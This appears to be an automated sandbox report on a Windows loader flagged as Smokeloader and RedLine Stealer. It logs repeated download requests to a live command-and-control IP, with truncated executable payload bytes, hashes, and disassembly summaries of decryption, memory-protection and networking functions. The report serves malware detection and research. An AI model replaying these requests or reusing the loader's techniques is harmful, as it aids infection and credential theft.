Dec 20, 2024 16:13:03.823446989 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:05.850284100 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:06.351279974 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:08.408279896 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:08.891609907 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:10.948123932 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:11.428795099 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:13.459070921 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:13.987493992 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:16.021811962 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:16.551589012 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:18.584225893 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:19.133531094 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:21.162305117 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:21.691819906 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:23.724641085 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:24.553721905 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:13:27.615362883 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:28.295043945 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:27 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Dec 20, 2024 16:13:31.652422905 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:13:33.589154005 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:31 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-a

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: BEd2lJRXFM.exePID: 5664, Parent PID: 2580

General

Target ID:	0
Start time:	10:12:33
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\BEd2lJRXFM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BEd2lJRXFM.exe"
Imagebase:	0x400000
File size:	1'980'416 bytes
MD5 hash:	1F39FAC8D8F8C1E3E0697EBF585AF36C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 648, Parent PID: 5664

General

Target ID:	6
Start time:	10:13:37
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 492
Imagebase:	0x6a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: BEd2lJRXFM.exePID: 5664, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	19.3%
Signature Coverage:	11.8%
Total number of Nodes:	1083
Total number of Limit Nodes:	21

Executed Functions

Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(0000000D), ref: 00402C96
SetLastError.KERNEL32(000000C1), ref: 00402CD8

Strings

FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
Section alignment invalid!, xrefs: 00402D5C
Size is not valid!, xrefs: 00402C9C
@, xrefs: 00402C8F
alignedImageSize != AlignValueUp!, xrefs: 00402DB9
ERROR_OUTOFMEMORY!, xrefs: 00402DEF
DOS header is not valid!, xrefs: 00402CC6
DOS header size is not valid!, xrefs: 00402D09
Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
API String ID: 1452528299-393758929
Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DB43F447), ref: 00403540
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
_mbstowcs.LIBCMT ref: 004035B7
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
GetLastError.KERNEL32 ref: 004035D8
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
GetLastError.KERNEL32 ref: 0040360A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
CryptDestroyKey.ADVAPI32(?), ref: 0040374E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3642901890-63410773
Opcode ID: a0ff43f580afe8f3995dcde7a2644c92267f14c521f0fca859abd751efac2b0a
Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
Opcode Fuzzy Hash: a0ff43f580afe8f3995dcde7a2644c92267f14c521f0fca859abd751efac2b0a
Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
LocalFree.KERNEL32(00000000), ref: 00402A62
LocalFree.KERNEL32(?), ref: 00402A67

Strings

Error protecting memory page, xrefs: 00402A41
%s: %s, xrefs: 00402A46

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$Error protecting memory page
API String ID: 839691724-1484484497
Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924

Strings

text, xrefs: 00401B5C

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: 74c99a18c910dce1e6054f9d50f006690a9fa5816be1f98360e8e89f05aab892
Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
Opcode Fuzzy Hash: 74c99a18c910dce1e6054f9d50f006690a9fa5816be1f98360e8e89f05aab892
Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF2F
TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF36
ExitProcess.KERNEL32 ref: 0040EF48

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58

Function 00E0A3EE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00E0A416
Module32First.KERNEL32(00000000,00000224), ref: 00E0A436

Memory Dump Source

Source File: 00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E09000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e09000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d47c833d2738fe0886f09ab7f4b1d48edebce6d0b642729d4befbb15e0c71187
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CDF0FC391003186BD7203BF4988DB6E76E8EF54324F141138E552E14C0D7B0EC854652

Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON

Download Yara Rule

Strings

emp, xrefs: 00408037
mixtwo, xrefs: 0040805C

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: Sleep
String ID: emp$mixtwo
API String ID: 3472027048-2390925073
Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

Function 004055C0 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1092
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,?,756CD120), ref: 00405620
__Init_thread_footer.LIBCMT ref: 00405847
Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A

Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9

Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A

Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99

Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09

Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D

Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD

Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9

Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79

Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11

Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6

Strings

viFO, xrefs: 00404537
^OX*, xrefs: 004046E8
DFEK, xrefs: 00404EDC
SUB=, xrefs: 00405632
Q)9, xrefs: 004056F8
updateSW, xrefs: 004051E8
KDOX, xrefs: 00404541
get, xrefs: 0040575C
mixone, xrefs: 00405ADF
]DFE, xrefs: 0040428D

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
API String ID: 2078494684-1136066708
Opcode ID: 7fba9629649c4136d0b733ee673e7c0618d10c2ff9c61210964d837162572417
Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
Opcode Fuzzy Hash: 7fba9629649c4136d0b733ee673e7c0618d10c2ff9c61210964d837162572417
Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000152A
__cftof.LIBCMT ref: 10001624
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
InternetCloseHandle.WININET(00000000), ref: 100016E0
InternetCloseHandle.WININET(00000000), ref: 100016E3
InternetCloseHandle.WININET(00000000), ref: 100016E9

Strings

GET, xrefs: 100016AA
http://, xrefs: 10001567

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
String ID: GET$http://
API String ID: 1233269984-1632879366
Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD

Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829

Strings

Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
GET, xrefs: 00401F81
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
